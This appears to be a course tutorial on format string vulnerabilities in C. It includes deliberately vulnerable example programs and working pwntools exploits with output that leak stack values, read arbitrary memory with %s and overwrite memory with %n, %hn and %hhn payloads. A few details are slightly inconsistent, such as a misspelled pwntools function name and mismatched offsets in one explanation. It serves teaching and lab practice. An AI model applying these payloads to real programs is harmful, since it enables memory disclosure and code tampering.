Skip to main content

Definition

Normal usage

A format string is a special string that contains ordinary characters (printed normally), and conversion specifications, used to display certain types of data by converting them.

It is used in functions such as printf(), fprintf(), in the first parameter. Example:

printf("I have %d apples.\n", 10);
// output:
// I have 10 apples.

The string "I have %d apples" is a format string.

%d is a conversion specification.
d is a conversion specifier.
Each specifier asks for the next argument in the function. So in this case, %d will try to convert the next argument after the format string, which is 10, into a signed decimal notation.

More specifiers are described in the manual man 3 printf.

Let's try to print out the same value with different specifiers :

int val = 10;

printf("Decimal: %d\nFloat: %f\nHex: 0x%x", val, (double) val, val);

Output:

Decimal: 10
Float: 10.000000
Hex: 0xa

Let's try to print it in hexadecimal format 3 times.

int val = 10;

printf("%x %x %x", val, val, val);

We get :

a a a

But what happens if you have more specifiers than arguments ?

Like :

int val = 10;

printf("%x %x %x", val);

We get something like this :

a f7c1ca2f 565561a4

What happened ?

As said earlier, each conversion specifier will expect an argument, so if we have 3 conversion specifiers, we need 3 arguments after the format string.
In a 32-bit architecture, arguments in a function are placed on the stack. So the printf function retrieves each argument on the stack, and if there are not enough, it just grabs the next value on the stack and uses it.

So on the previous example, the stack right before the call to printf looked like this :

pwndbg> stack
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0xa /* '\n' */
02:0008│ 0xffffd1a8 —▸ 0xf7c1ca2f ◂— '_dl_audit_preinit'
03:000c│ 0xffffd1ac —▸ 0x565561a4 (replace_me) ◂— 0x2
04:0010│ 0xffffd1b0 —▸ 0xffffd1f0

We can recognize the 0xa (10 in hexadecimal) on the offset 1 on the stack, then f7c1ca2f, then 565561a4.

Exploit: read

Leaking the stack

Let's play with a simple example in C :

main.c
#include <stdio.h>

int main(int argc, char **argv)
{
int secret = 0xdead;
int secret2 = 0xbeef;
printf(argv[1], 10);
return 0;
}

Compile it with :

gcc main.c -o main -m32

And test it :

./main %p.%p.%p.%p.%p.%p
0xa.0xf7c1ca2f.0x565561a4.0xffffd1f0.0xf7fc1678.0xbeef.0xdead
1 |2 |3 |4 |5 |6 |7

You can see the variables secret and secret2 leaked in the output, because they are stored on the stack.

If you open it in gdb, and put a breakpoint right before the call to printf(), you'd see this :

pwndbg> stack 20
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0xa /* '\n' */
02:0008│ 0xffffd1a8 —▸ 0xf7c1ca2f ◂— '_dl_audit_preinit'
03:000c│ 0xffffd1ac —▸ 0x565561a4 (main+23) ◂— 0x2e5005
04:0010│ 0xffffd1b0 —▸ 0xffffd1f0 —▸ 0xf7e1cff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x21cd8c
05:0014│ 0xffffd1b4 —▸ 0xf7fc1678 —▸ 0xf7ffdbac —▸ 0xf7fc1790 —▸ 0xf7ffda40 ◂— ...
06:0018│ 0xffffd1b8 ◂— 0xbeef
07:001c│ 0xffffd1bc ◂— 0xdead
08:0020│ 0xffffd1c0 —▸ 0xffffd1e0 ◂— 0x1
09:0024│ 0xffffd1c4 —▸ 0xf7e1cff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x21cd8c
0a:0028│ ebp 0xffffd1c8 ◂— 0x0
0b:002c│ 0xffffd1cc —▸ 0xf7c23295 (__libc_start_call_main+117) ◂— add esp, 0x10

So when we print 6 %p, we effectively print the 6 next elements that are stored on the stack.

Choosing an offset

Format string syntax allows to set an offset. Since we know our value of interest is the 6th element of the stack, we can just print it with %6$p.

./main $(echo '%6$p')
0xbeef
info

We use $(echo ...) to avoid the variable expansion of our $ character by the shell. But you can also use the escape character \, which would look like :

./main %6\$p
0xbeef

Arbitrary read

Leaking values off the stack is nice, but what if we want to leak one specific value at a given address ? It is possible, with the help of the %s specifier !

A string is just a pointer to an array of character. The %s specifier will dereference the pointer, and print the array of characters at that address. Combined with an offset, we can point %<offset>$s to a value on the stack, so that it prints its content.

Let's see an example in C:

// gcc main.c -o main -m32
#include <stdio.h>

int main(int argc, char **argv)
{
char *secret = "mysecret";

printf("secret is at %p\n", secret);

char buffer[30];
fgets(buffer, sizeof(buffer), stdin);

printf(buffer);
return 0;
}

So in this code, the content of the variable secret is not printed, only its address is displayed.
Notice the usage of a secure fgets() instead of the insecure gets(), which reads user input until size - 1 (so 29 bytes here).

Our goal will be to use the address of the variable to print the content.

When running this program, we have :

./main
secret is at 0x56557008

And it waits for our input.

Let's first see where our input is located on the stack when printf is executed.

└─$ ./main
secret is at 0x56557008
%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
0x1e.0xf7e1d620.0x565561b4.0xf7fc7550.(nil).0xf7c1ca2f.0x7025d048.0x2e70252e.0x252e7025.0x70252e70
1 |2 |3 |4 |5 |6 |7 ^
tip

Use python3 repl to generate a string like that quickly, and check its length.

$ python3
>>> "%p." * 10
'%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.'
>>> len("%p." * 10)
30

As we can see in the output, our format string is stored at offset 7 of the stack.
0x7025 is p% in little-endian, so %p.

python3
>>> bytearray.fromhex("7025")
bytearray(b'p%')

But it's cut in half, our string does not start exactly at offset 7, there's a d048 before. So we can pad our string to make it start exactly at an offset. Let's prepend aa to our string.

└─$ ./main
secret is at 0x56557008
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x565561b4.0xf7fc7550.(nil).0xf7c1ca2f.0x6161d048.0x252e7025.0x70252e70.
1 |2 |3 |4 |5 |6 |7 a a |8 ^

Now, our format string %p.%p... starts exactly at offset 8 on the stack.

So we can just put the address we want to leak at that place, then point the %s specifier to that value.

question

Can you guess how the payload will look like ?
Elements to re-order: [address][specifier][padding]

Answer
[padding][address][specifier]
Final Exploit
from pwn import *

target = './main'

elf = context.binary = ELF(target)

payload = b'aa' # padding
payload += p32(0x56557008) # address of var `secret`
payload += b'%8$s' # string specifier

p = process()
print(p.clean())
p.sendline(payload)
print(p.clean())
└─$ python3 exploit.py
[*] '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main': pid 27765
b'secret is at 0x56557008\n'
[*] Process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main' stopped with exit code 0 (pid 27765)
b'aa\x08pUVmysecret\n'

Now go practice with the easy exercises for format string.

Exploit: write

We learned that with a user-controlled format string, we can read anywhere.

But we can also write anywhere ! Thanks to the specifier %n:

%n: The number of characters written so far is stored into the integer pointed to by the corresponding argument.

Source: man 3 printf

question
int len = 0;
printf("hello %n", &len);

What is the value of len ?

Answer
6.
hello = 5 bytes
space = 1 byte

Right before the call to printf, the stack looked like this:

pwndbg> stack 20
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0x56556123 (len) ◂— 0x0
...

The address of the variable len is on the first offset on the stack, and %n replaces the value pointed by 0x56556123 (len).

Example

Let's try with an example:

main.c
// gcc main.c -m32 -o main -no-pie
#include <stdio.h>

int replace_me = 0;

void main()
{
char buffer[30];
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);

if (replace_me == 10)
{
puts("You win !");
}
else if (replace_me != 0)
{
puts("You're close, keep trying...");
}
}

The goal is to overwrite the value of the variable replace_me with 10. No buffer overflow allowed here, since we're using the secure fgets.

Find address

First, let's try to find the address of the variable we want to replace. Since replace_me is a global variable (and it was compiled with -no-pie), we can just retrieve its address using readelf binary.

└─$ readelf -s main | grep "replace_me"
25: 0804c01c 4 OBJECT GLOBAL DEFAULT 24 replace_me

So replace_me's address is 0x804c01c.

Find stack offset

Next, we need to find where our payload will end up on the stack.

└─$ ./main
%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
0x1e.0xf7e1d620.0x804918d.0x702514a0.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70
1 |2 |3 |4 ^

Seems like it's on the 4th element of the stack, but it's cut in half again by some random bytes.

So we can just add some padding to have our string located exactly at offset 5.

└─$ ./main
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x804918d.0x616114a0.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.
1 |2 |3 |4 a a |5 ^

Now we can build our payload. We want the stack to be looking like this:

└─$ ./main
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x804918d.0x616114a0.0x1cc00408....
1 |2 |3 |4 a a |5 address of replace_me

Write exploit

from pwn import *

target = './main'
elf = context.binary = ELF(target)

REPLACE_ME = 0x0804c01c

p = process()

payload = b'aa' # padding, 2 bytes
payload += p32(REPLACE_ME) # address of variable replace_me, 4 bytes
payload += b'a' * 4 # 6 bytes written already, need to add 4 to make 10
payload += b'%5$n' # write 10 to address that is on offset 5 of the stack

print(p.clean())
p.sendline(payload)
print(p.clean())
└─$ python3 exploit.py
[*] '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main': pid 29583
14
b''
[*] Process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main' stopped with exit code 10 (pid 29583)
b'aa\x1c\xc0\x04\x08aaaa\nYou win !\n'

You can also use these specifiers to write characters:

  • %<length>d
  • %<length>c

In our previous exploit, it would look like :

payload = b'aa'
payload += p32(REPLACE_ME)
payload += b'%4d%5$n' # or b'%4c%5$n'

Automate with pwntools

Pwntools has a feature for automating %n format string exploits:

payload = fmstr_payload(offset, {location: value}, numbwritten)
  • offset is the offset we find on the stack
  • location is the address where we want to write
  • value is the value we want to write at location
  • numbwritten (optional) is the number of already written bytes

The dictionary can contain more values if needed, in case we need to write at multiple addresses.

Check https://docs.pwntools.com/en/stable/fmtstr.html#pwnlib.fmtstr.FmtStr for more details.

For our example, the payload would look like :

payload = b'aa'
payload += fmtstr_payload(5, {REPLACE_ME: 10}, 2)
  • 5 is offset on the stack
  • 2 is to match b'aa' that were already written

Multi-byte write

What if we want to write a very large number ? Like 0xbabeface, at address 0xffffaaaa ?

We can't just write everything in one int, since the maximum value of an int is 2 147 483 647, and 0xbabeface in decimal is 3,133,078,222. It will just overflow the int.

So we need to split the write in multiple bytes. We can either:

  • write in byte by byte (little-endian, so reverse order):
    0xffffaaaa:   0xce
    0xffffaaab: 0xfa
    0xffffaaac: 0xbe
    0xffffaaad: 0xba
    You can use %hhn to write byte by byte
  • write in 2 shorts (2 bytes + 2 bytes)
    0xffffaaaa:   0xface
    0xffffaaac: 0xbabe
    You can use %hn to write shorts
question

How would the payload look like if we wanted to overwrite the value at address 0xffffaaaa with value 0xbabeface, and :

  • using bytes write (%hhn)
  • payload starts at offset 5
Hint 1
Payload layout :
[1st writing][offset specifier][2nd writing][offset specifier] [3rd writing][offset specifier][4th writing][offset specifier] [1st address][2nd address][3rd address][4th address]
Hint 2
Start to write the smallest byte 0xba, then add the others in ascending order. (smallest to largest)
Hint 3
Do not forget to take into account previously written bytes.
Answer
%186c%16$hhn%4c%17$hhn%16c%18$hhn%44c%19$hhn\xad\xaa\xff\xff\xac\xaa\xff\xff\xaa\xaa\xff\xff\xab\xaa\xff\xff
  • %186c: we first write ba because it's the smallest byte
  • %16$hhn: we write on the address at offset 16, which should be 0xffffaaad (offset determined at the end)
  • %4c: next byte to print is be, and we already printed 186 chars, so we need 0xbe - 0xba = 4 to print ba
  • %17$hhn: we write on the address at offset 17, which should be 0xffffaaac
  • %16c: next byte to print is ce, and we already printed 190 chars, so we need 0xce - 0xbe = 16 to print ce
  • %18$hhn: we write on the address at offset 18, which should be 0xffffaaaa
  • %44c: next byte to print is fa, and we already printed 206 chars, so we need 0xfa - 0xce = 44 to print fa
  • %19$hhn: we write on the address at offset 19, which should be 0xffffaaab
  • \xad\xaa\xff\xff: 0xffffaaad packed in little-endian
  • \xac\xaa\xff\xff: 0xffffaaac packed in little-endian
  • \xaa\xaa\xff\xff: 0xffffaaaa packed in little-endian
  • \xab\xaa\xff\xff: 0xffffaaab packed in little-endian

To calculate the offsets, you need to craft the whole payload first.

%186c%$hhn%4c%$hhn%16c%$hhn%44c%$hhn

Then you calculate the total length of the payload:

>>> len('%186c%$hhn%4c%$hhn%16c%$hhn%44c%$hhn')
36

36 / 4 = 9, so this payload without offsets will take 9 slots on the stack.
We know that our offsets will be superior than 5 + 9 = 14, so each offset will take 2 bytes. We have 4 offsets to place, so 4 * 2 = 8 bytes. The total length of our payload will be 36 + 8 = 44 bytes, and it's a multiple of 4 bytes so no need to pad to align the addresses (they will start exactly at a certain offset). 44 / 4 = 11, so our first address will start at offset 5 + 11 = 16.

question

How would the payload look like if we wanted to overwrite the value at address 0xffffaaaa with value 0xbabeface, and :

  • using shorts write (%hn)
  • payload starts at offset 5
Hint 1
Payload layout :
[1st writing][offset specifier][2nd writing][offset specifier][1st address][2nd address]
Hint 2
Start by writing 0xbabe.
Hint 3
Each element on the stack is 4 bytes. You may need to pad your payload (before [1st address]), so that your addresses start exactly at a certain offset.
Answer
%47806c%12$hn%16400c%13$hnaa\xac\xaa\xff\xff\xaa\xaa\xff\xff
  • %47806c: we first write babe because it's smaller than face (can't do it the other way)
  • %12$hn: we write on the address at offset 12, which should be 0xffffaaac
  • %16400c: we already printed 47806 chars, so we need 0xface - 0xbabe = 16400 more to print face
  • %13hn: we write on the address at offset 13, which should be 0xffffaaaa
  • aa: padding to add, so that total length is aligned to 4 bytes (multiple of 4)
  • \xac\xaa\xff\xff: 0xffffaaac packed in little-endian
  • \xaa\xaa\xff\xff: 0xffffaaaa packed in little-endian

The offsets are 12 and 13, because the string %47806c%11$hn%16400c%12$hnaa contains 28 bytes. 28 / 4 = 7 elements on the stack.
Since our payload starts at offset 5, 5 + 7 = 12, so our addresses will start on the stack at offset 12, then 13.